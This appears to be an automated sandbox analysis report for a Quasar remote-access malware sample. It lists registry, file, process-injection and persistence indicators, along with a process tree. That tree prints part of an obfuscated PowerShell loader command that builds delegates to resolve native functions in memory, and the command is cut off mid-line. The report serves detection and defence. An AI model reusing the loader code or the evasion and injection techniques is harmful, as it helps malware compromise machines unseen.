quasar | 3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4948 set thread context of 4296	4948	powershell.exe	112
PID 3236 set thread context of 2952	3236	powershell.EXE	115

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$nya-onimai3	powershell.exe
File created	C:\Windows\$nya-onimai3\$nya-Loli.bat	powershell.exe
File opened for modification	C:\Windows\$nya-onimai3\$nya-Loli.bat	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 Jan 2025 06:06:31 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1738044390"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1820	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1776	powershell.exe
1776	powershell.exe
1236	powershell.exe
1236	powershell.exe
672	powershell.exe
672	powershell.exe
672	powershell.exe
672	powershell.exe
672	powershell.exe
3236	powershell.EXE
3236	powershell.EXE
3236	powershell.EXE
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
672	powershell.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
672	powershell.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
672	powershell.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe
2952	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	672	powershell.exe
Token: SeDebugPrivilege	3236	powershell.EXE
Token: SeDebugPrivilege	3236	powershell.EXE
Token: SeDebugPrivilege	2952	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2072	svchost.exe
Token: SeIncreaseQuotaPrivilege	2072	svchost.exe
Token: SeSecurityPrivilege	2072	svchost.exe
Token: SeTakeOwnershipPrivilege	2072	svchost.exe
Token: SeLoadDriverPrivilege	2072	svchost.exe
Token: SeSystemtimePrivilege	2072	svchost.exe
Token: SeBackupPrivilege	2072	svchost.exe
Token: SeRestorePrivilege	2072	svchost.exe
Token: SeShutdownPrivilege	2072	svchost.exe
Token: SeSystemEnvironmentPrivilege	2072	svchost.exe
Token: SeUndockPrivilege	2072	svchost.exe
Token: SeManageVolumePrivilege	2072	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2072	svchost.exe
Token: SeIncreaseQuotaPrivilege	2072	svchost.exe
Token: SeSecurityPrivilege	2072	svchost.exe
Token: SeTakeOwnershipPrivilege	2072	svchost.exe
Token: SeLoadDriverPrivilege	2072	svchost.exe
Token: SeSystemtimePrivilege	2072	svchost.exe
Token: SeBackupPrivilege	2072	svchost.exe
Token: SeRestorePrivilege	2072	svchost.exe
Token: SeShutdownPrivilege	2072	svchost.exe
Token: SeSystemEnvironmentPrivilege	2072	svchost.exe
Token: SeUndockPrivilege	2072	svchost.exe
Token: SeManageVolumePrivilege	2072	svchost.exe
Token: SeAuditPrivilege	2824	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2072	svchost.exe
Token: SeIncreaseQuotaPrivilege	2072	svchost.exe
Token: SeSecurityPrivilege	2072	svchost.exe
Token: SeTakeOwnershipPrivilege	2072	svchost.exe
Token: SeLoadDriverPrivilege	2072	svchost.exe
Token: SeSystemtimePrivilege	2072	svchost.exe
Token: SeBackupPrivilege	2072	svchost.exe
Token: SeRestorePrivilege	2072	svchost.exe
Token: SeShutdownPrivilege	2072	svchost.exe
Token: SeSystemEnvironmentPrivilege	2072	svchost.exe
Token: SeUndockPrivilege	2072	svchost.exe
Token: SeManageVolumePrivilege	2072	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2072	svchost.exe
Token: SeIncreaseQuotaPrivilege	2072	svchost.exe
Token: SeSecurityPrivilege	2072	svchost.exe
Token: SeTakeOwnershipPrivilege	2072	svchost.exe
Token: SeLoadDriverPrivilege	2072	svchost.exe
Token: SeSystemtimePrivilege	2072	svchost.exe
Token: SeBackupPrivilege	2072	svchost.exe
Token: SeRestorePrivilege	2072	svchost.exe
Token: SeShutdownPrivilege	2072	svchost.exe
Token: SeSystemEnvironmentPrivilege	2072	svchost.exe
Token: SeUndockPrivilege	2072	svchost.exe
Token: SeManageVolumePrivilege	2072	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2072	svchost.exe
Token: SeIncreaseQuotaPrivilege	2072	svchost.exe
Token: SeSecurityPrivilege	2072	svchost.exe
Token: SeTakeOwnershipPrivilege	2072	svchost.exe
Token: SeLoadDriverPrivilege	2072	svchost.exe
Token: SeSystemtimePrivilege	2072	svchost.exe
Token: SeBackupPrivilege	2072	svchost.exe
Token: SeRestorePrivilege	2072	svchost.exe
Token: SeShutdownPrivilege	2072	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
672	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 708 wrote to memory of 384	708	cmd.exe	84
PID 708 wrote to memory of 384	708	cmd.exe	84
PID 708 wrote to memory of 1776	708	cmd.exe	85
PID 708 wrote to memory of 1776	708	cmd.exe	85
PID 1776 wrote to memory of 1820	1776	powershell.exe	93
PID 1776 wrote to memory of 1820	1776	powershell.exe	93
PID 1776 wrote to memory of 1236	1776	powershell.exe	95
PID 1776 wrote to memory of 1236	1776	powershell.exe	95
PID 1236 wrote to memory of 4300	1236	powershell.exe	97
PID 1236 wrote to memory of 4300	1236	powershell.exe	97
PID 4300 wrote to memory of 3576	4300	cmd.exe	101
PID 4300 wrote to memory of 3576	4300	cmd.exe	101
PID 4300 wrote to memory of 672	4300	cmd.exe	102
PID 4300 wrote to memory of 672	4300	cmd.exe	102
PID 672 wrote to memory of 4380	672	powershell.exe	103
PID 672 wrote to memory of 4380	672	powershell.exe	103
PID 672 wrote to memory of 4948	672	powershell.exe	110
PID 672 wrote to memory of 4948	672	powershell.exe	110
PID 672 wrote to memory of 4948	672	powershell.exe	110
PID 672 wrote to memory of 4948	672	powershell.exe	110
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 4948 wrote to memory of 4296	4948	powershell.exe	112
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 3236 wrote to memory of 2952	3236	powershell.EXE	115
PID 2952 wrote to memory of 616	2952	dllhost.exe	5
PID 2952 wrote to memory of 676	2952	dllhost.exe	7
PID 2952 wrote to memory of 960	2952	dllhost.exe	12
PID 2952 wrote to memory of 64	2952	dllhost.exe	13
PID 2952 wrote to memory of 428	2952	dllhost.exe	14
PID 2952 wrote to memory of 1036	2952	dllhost.exe	16
PID 2952 wrote to memory of 1136	2952	dllhost.exe	17
PID 2952 wrote to memory of 1144	2952	dllhost.exe	18
PID 2952 wrote to memory of 1156	2952	dllhost.exe	19
PID 2952 wrote to memory of 1224	2952	dllhost.exe	20
PID 2952 wrote to memory of 1244	2952	dllhost.exe	21
PID 2952 wrote to memory of 1288	2952	dllhost.exe	22
PID 2952 wrote to memory of 1396	2952	dllhost.exe	23
PID 2952 wrote to memory of 1408	2952	dllhost.exe	24
PID 2952 wrote to memory of 1488	2952	dllhost.exe	25
PID 2952 wrote to memory of 1572	2952	dllhost.exe	26
PID 2952 wrote to memory of 1580	2952	dllhost.exe	27
PID 2952 wrote to memory of 1652	2952	dllhost.exe	28
PID 2952 wrote to memory of 1716	2952	dllhost.exe	29
PID 2952 wrote to memory of 1756	2952	dllhost.exe	30
PID 2952 wrote to memory of 1764	2952	dllhost.exe	31
PID 2952 wrote to memory of 1852	2952	dllhost.exe	32
PID 2952 wrote to memory of 2000	2952	dllhost.exe	33
PID 2952 wrote to memory of 2024	2952	dllhost.exe	34
PID 2952 wrote to memory of 1448	2952	dllhost.exe	35
PID 2952 wrote to memory of 1704	2952	dllhost.exe	36
PID 2952 wrote to memory of 2072	2952	dllhost.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{bc05c5b5-8ab0-42f5-8cc8-d0191ad8dae5}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2952

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1156
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PHnmMaDyYvVP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FrUZVLKCqCrfSh,[Parameter(Position=1)][Type]$CsHzUwyQVr)$qITvUtfkArS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'du'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+'l'+''+'e'+''+'g'+'a'+'t'+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+[Char](115)+'',[MulticastDelegate]);$qITvUtfkArS.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'cia'+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eByS'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$FrUZVLKCqCrfSh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$qITvUtfkArS.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+',Virtua'+'l'+'',$CsHzUwyQVr,$FrUZVLKCqCrfSh).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $qITvUtfkArS.CreateType();}$SpEHOpUwNwaIe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+'N'+'a'+'t'+'i'+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$kAtxpwBnnLoCsb=$SpEHOpUwNwaIe.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+'Ad'+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+',S'+[Char](116)+'a'+[Char](116)+''+'i'+'c'),$Null,[Re